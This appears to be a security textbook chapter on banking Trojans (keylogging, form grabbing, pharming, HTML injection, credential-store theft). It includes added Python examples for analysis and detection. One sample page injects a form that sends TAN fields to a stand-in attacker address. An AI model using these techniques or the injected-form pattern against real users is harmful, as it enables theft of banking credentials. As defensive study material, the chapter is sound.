The Evolution of Cyber Fraud Techniques: Trojans and Toolkits
Trojans are the future of cyber fraud and are already beginning to dominate its present. They automate what was previously done by hand: rather than relying on a victim to type his or her information into the fields of a phishing page, a Trojan simply copies the victim's stored credentials or records the keystrokes. Trojan and phishing toolkits also let their users generate multiple customized variants of a Trojan, and this continuous variability makes the Trojans more successful and harder to detect promptly.
This has, without exaggeration, revolutionized the phishing scene. An analysis by X-Force in Germany found that of 1 week's worth of captured phishing pages (3,256 in total), more than 90 percent stemmed from phishing kits. Moreover, the number of hosting locations shrinks as phishing kits proliferate: of the 388 domains hosting the captured pages, only 100 held all of the kit-made pages (92 percent of the sample), and 44 percent of those were hosted under Hong Kong's country-code top-level domain (.hk). In sum, phishing kits make a single attacker at least four times, and as much as eight times, more prolific. The trend shows no sign of abating; on the contrary, the kits improve every day and now resemble professionally designed software suites, with polished user interfaces, update life cycles, and version control.
Malicious code targeting financial institutions falls into two related categories: targeted code and generic, kit-based Trojans. Authors write targeted Trojans for financial institutions whose login systems are more elaborate than a standard username and password; less sophisticated code, such as generic keystroke-logging and form-grabbing Trojans, also imposes financial costs on institutions.
There are several basic categories of Trojans, differentiated here by their behavioral function rather than by their design (that is, the manner in which they compromise a system) or by their distribution scheme.
Keystroke Logging
Keystroke-logging software, or keyloggers, is the simplest form of information-stealing software. A keylogger records every key typed on the victim's keyboard, producing large amounts of data that include spaces, line breaks, and backspace keys. Trojan authors have incorporated keystroke logging into Trojan and Remote Administration Tool (RAT) toolkits since the late 1990s; it became widespread with early Trojans such as Back Orifice, NetBus, and SubSeven. Today keystroke loggers are features of many RATs, such as Nuclear RAT, ProRAT, and Bifrost. Many other types of Trojans carry generic keyloggers that gather large amounts of stolen data even when the attacker is not targeting specific sites; in addition to RATs, generic keyloggers are often present in online-game credential-stealing Trojans and various IRC bot families. Keystroke logging cannot grab forms: only what is typed appears in the log.
The user in the example above visited a bank's Web site from his or her home computer. The attacker cannot capture which state the user belongs to, because the state is chosen from a drop-down list rather than typed. The site presented the user with its SiteKey picture and the user then entered his or her password. The attacker therefore cannot retrieve enough information to log in from a computer not already registered to that user. Had the user not been at his or her home location, the attacker would have received additional typed fields (the answers to the challenge questions) but still could not determine the state or which questions the answers corresponded to.
Form Grabbing
Keystroke logging reveals all text typed by a user. Its obvious disadvantages are an unmanageable volume of data and an inability to capture important inputs such as drop-down boxes, check boxes, and fields filled without the keyboard. Form grabbing is the generic term for capturing every field sent via POST and GET requests by intercepting the form before the browser sends it to the server. Attackers have two primary options for this. They can sniff GET and POST requests directly from the system's network traffic using a packet-capture library such as WinPcap, or they can inject dynamic link libraries (DLLs) into the browser to intercept requests before they are sent; the most common approach is a browser helper object (BHO) for Internet Explorer. The in-browser method has the added advantage of capturing requests before they are encrypted and retrieving responses after they are decrypted.
Because most sites that require authentication use Secure Sockets Layer (SSL), the in-browser method is the only one of the two that works: a packet sniffer sees only ciphertext. Generic form grabbing against SiteKey users connecting from their validated computers will likely leave attackers with insufficient information to log in from an unknown computer. Many Trojans, however, also provide proxy access through the infected system, which lets the attacker connect from the victim's own machine, where the additional questions are not asked.
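The difference between the two collection methods is easiest to see on a concrete session. The code below is an added illustration for this section, not code from the original text or from any Trojan: it replays a constructed keystroke log into fields and decodes a constructed form-grabber capture of the same SiteKey-style login, then reports which named fields the keylogger recovered at all. The log token format ([TAB], [ENTER], [BACKSPACE], [WIN: ...]) and the field names (online_id, state, passcode, remember) are assumptions made for the example.

```python
"""Added example (not from the original text): what a keystroke logger and a
form grabber each recover from the same SiteKey-style login.

The keylog token format and the form field names are assumptions made for
this example; real Trojans use their own formats."""
from urllib.parse import parse_qs

# Constructed keystroke log for one login session: raw keys plus bracketed
# special tokens. The state was picked from a drop-down list, so it never
# appears; the user also mistyped the ID and corrected it with Backspace.
KEYLOG = "[WIN: Bank Sign In]jsmithh[BACKSPACE][TAB]Tr0ub4dor&3[ENTER]"

# Constructed form-grabber capture of the same session: the POST body taken
# inside the browser before SSL encryption, so every field is present by name.
FORM_GRAB = "online_id=jsmith&state=CA&passcode=Tr0ub4dor%263&remember=on"


def tokenize(log):
    """Split a keylog into single characters and bracketed special tokens."""
    tokens, i = [], 0
    while i < len(log):
        if log[i] == "[":
            j = log.index("]", i)  # ValueError on an unterminated token
            tokens.append(log[i:j + 1])
            i = j + 1
        else:
            tokens.append(log[i])
            i += 1
    return tokens


def reconstruct(log):
    """Replay keys into fields: TAB/ENTER end a field, BACKSPACE deletes one
    character, window-title tokens are dropped. Returns the typed strings in
    order; which form field each one went into is unknown to the attacker."""
    fields, buf = [], []
    for t in tokenize(log):
        if t == "[BACKSPACE]":
            if buf:
                buf.pop()
        elif t in ("[TAB]", "[ENTER]"):
            fields.append("".join(buf))
            buf = []
        elif t.startswith("[WIN:"):
            continue
        else:
            buf.append(t)
    if buf:
        fields.append("".join(buf))
    return fields


def parse_form_grab(body):
    """Decode a captured application/x-www-form-urlencoded body into
    {name: value}. Drop-down and checkbox values are present because the
    browser serialises them like any other field."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def compare(log, body):
    """For each named field in the form capture, say whether the keylogger
    recovered the same value at all."""
    typed = set(reconstruct(log))
    return {name: (value in typed) for name, value in parse_form_grab(body).items()}


if __name__ == "__main__":
    print("keylogger fields:", reconstruct(KEYLOG))
    print("form grab:", parse_form_grab(FORM_GRAB))
    print("recovered by keylogger:", compare(KEYLOG, FORM_GRAB))
```

The keylogger yields two anonymous strings; the form grab yields four named fields including the drop-down state and the "remember" checkbox, which is why a form grabber, unlike a keylogger, can tell the attacker exactly what to replay.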
Screenshots and Mouse-Event Capturing
Trojan authors added the ability to take screenshots and capture mouse events at about the same time they added keystroke logging. Even so, many information-stealing Trojans that simply copied the techniques of common RATs did not add this ability until banks began using virtual keyboards for credential entry (see Figure 2.23). A screenshot taken around each mouse click reveals which on-screen key was pressed, so a virtual keyboard defeats a keylogger but not a Trojan with this feature. If an institution does not currently use virtual keyboards, the feature has little impact on it. Screenshots may still be valuable to attackers, however, because they can capture users' SiteKey images for use in future attacks.
Figure 2.23. A virtual keyboard login.
Phishing and Pharming Trojans
Phishing and pharming Trojans are nearly identical. In both, a user who intends to visit a particular Web site is redirected and shown an alternate site. The confusion stems mainly from the definition of pharming, and whether redirecting a user to a specific URL counts as phishing or pharming; many security companies' definitions of pharming count only the redirection of an entire domain to a separate IP address, whose server must then be able to serve the entire host.
The argument is not important, because both techniques work in essentially the same way: the user is redirected to a set of convincing templates. The most advanced form of this Trojan connects to the real site, so that the genuine SSL exchange takes place and the URL bar stays intact, while overlaying a phishing page on top.
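One common way a pharming Trojan implements the domain-level redirection described above is to overwrite the local hosts file so that the bank's hostname resolves to the attacker's server (on Windows, %SystemRoot%\System32\drivers\etc\hosts). The page itself does not name the mechanism, so that is an assumption of this added example, which is not code from the original text. It audits hosts-file content for entries naming watched bank domains; the file content, IP addresses, and domain names are constructed.

```python
"""Added example (not from the original text): audit a hosts file for
pharming entries. Assumes the Trojan redirects a domain by editing the hosts
file; the page does not state the mechanism."""
import ipaddress

# Constructed hosts-file content: the usual loopback lines, a comment, an
# ad-blocker blackhole entry, and two entries a pharming Trojan might add.
# The bank names and the 198.51.100.23 address are placeholders.
HOSTS_TEXT = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
198.51.100.23   www.examplebank.test examplebank.test
198.51.100.23   online.examplebank.test   # looks like a CDN entry
0.0.0.0         ads.tracker.test
"""

# Hostnames that must only ever be resolved through DNS, never locally.
WATCHED = {"www.examplebank.test", "examplebank.test", "online.examplebank.test"}


def parse_hosts(text):
    """Yield (ip, hostname) pairs; strips comments and skips malformed lines."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # first token is not an address; ignore the line
        for host in parts[1:]:
            yield ip, host.lower()


def find_pharming_entries(text, watched):
    """Return {hostname: ip} for every watched name that has a local
    override. Any such entry is suspicious: a bank's name should never be
    pinned in the hosts file, whatever address it points to."""
    return {host: str(ip) for ip, host in parse_hosts(text) if host in watched}


def audit_file(path, watched):
    """Read a hosts file from disk and run the check on it."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_pharming_entries(fh.read(), watched)


if __name__ == "__main__":
    for host, ip in find_pharming_entries(HOSTS_TEXT, WATCHED).items():
        print(f"PHARMING? {host} -> {ip}")
```

In a real deployment the watched set is the institution's own hostnames, and the same check belongs in endpoint telemetry: a hosts file that changes at all outside of patching is worth an alert. It does not catch redirection done inside the browser (the SSL-preserving overlay described above), which leaves the hosts file untouched.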
Hypertext Markup Language (HTML) Injection
HTML injection lets attackers carry out an "on-the-fly" phishing attack. Victims visit their real banking Web site, and additional HTML code is injected into the page after it finishes loading. This lets attackers capture fields that are not part of the standard forms but provide useful information (Figure 2.24 and Figure 2.25). Attackers also use HTML injection to create pop-ups with virtual keyboards, and to add fields that attempt to capture entire transaction number (TAN) sheets.
Figure 2.24. A logon page before an HTML injection.
Figure 2.25. An HTML injection.
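Because the injected fields arrive after the genuine page has loaded, the bank can detect them by comparing the forms the page actually contains against the forms it served. The example below is added here and is not code from the original text: it parses a constructed logon page before and after an injection of the kind shown in Figures 2.24 and 2.25, reports the fields that were not in the baseline, and flags any form whose action posts to a foreign origin. The markup, field names, and the 198.51.100.23 collection address are constructed for the example.

```python
"""Added example (not from the original text): detect HTML-injected form
fields by diffing a page against its known-good form layout. The page
markup, field names and addresses are constructed for this example."""
from html.parser import HTMLParser

# Constructed logon page exactly as the bank serves it.
ORIGINAL_PAGE = """
<form id="logon" action="/login" method="post">
  <input type="text" name="online_id">
  <input type="password" name="passcode">
  <input type="submit" value="Sign in">
</form>
"""

# The same page after a Trojan injected extra fields once loading finished:
# two new inputs inside the real form and a whole new form for TAN capture
# that posts to the attacker's collection server.
INJECTED_PAGE = """
<form id="logon" action="/login" method="post">
  <input type="text" name="online_id">
  <input type="password" name="passcode">
  <input type="text" name="card_number">
  <input type="text" name="atm_pin">
  <input type="submit" value="Sign in">
</form>
<form id="tan" action="http://198.51.100.23/collect" method="post">
  <input type="text" name="tan_1"><input type="text" name="tan_2">
</form>
"""


class FormFieldParser(HTMLParser):
    """Collect, per form, its id, its action and the names of its fields."""

    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"id": a.get("id"), "action": a.get("action") or "", "fields": set()}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            if a.get("name"):
                self._current["fields"].add(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def extract_forms(html):
    parser = FormFieldParser()
    parser.feed(html)
    return parser.forms


def is_foreign_action(action, own_origin):
    """True if the form posts somewhere other than the bank's own origin.
    An empty action submits to the current URL; a root-relative path stays on
    the site; "//host/..." is protocol-relative and therefore foreign."""
    if not action:
        return False
    if action.startswith("//"):
        return True
    return not (action.startswith("/") or action.startswith(own_origin))


def injected_fields(baseline_html, observed_html, own_origin="https://www.examplebank.test"):
    """Report fields absent from the baseline form of the same id, and forms
    whose action points away from the bank."""
    base = {f["id"]: f["fields"] for f in extract_forms(baseline_html)}
    report = {"extra_fields": {}, "foreign_forms": []}
    for form in extract_forms(observed_html):
        extra = form["fields"] - base.get(form["id"], set())
        if extra:
            report["extra_fields"][form["id"]] = sorted(extra)
        if is_foreign_action(form["action"], own_origin):
            report["foreign_forms"].append(form["id"])
    return report


if __name__ == "__main__":
    print(injected_fields(ORIGINAL_PAGE, INJECTED_PAGE))
```

In practice the baseline is a manifest the server sends with the page and the comparison runs in the bank's own client-side script, reporting back to the server. It is a detection aid rather than a guarantee: a Trojan that already rewrites the DOM can also remove the script, so the server should treat a missing report as seriously as a positive one.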
Protected Storage Retrieval
Windows 2000, XP, and Server 2003 provide a Protected Storage system that holds passwords for applications including Internet Explorer, Outlook Express, and MSN. Users of Internet Explorer's "remember my password" feature have all of their saved passwords stored there. Firefox ships a similar feature for remembering form data. Protected storage retrieval is standard in many Trojans and is extremely effective against sites that rely on standard username and password authentication.
Although exact formats vary by Trojan, it is common for them to be able to export certificates from the Windows certificate stores: the CA (certificate authority), MY (personal), ROOT, and SPC (software publisher certificate) stores, as well as personal information exchange (PFX) files, and potentially others.
VeriSign iDefense encounters many drop sites holding stolen certificates. Although it is unclear how many attackers actually use the certificates they steal, this functionality threatens an institution's clients wherever the underlying technology relies on stored client certificates to perform transactions.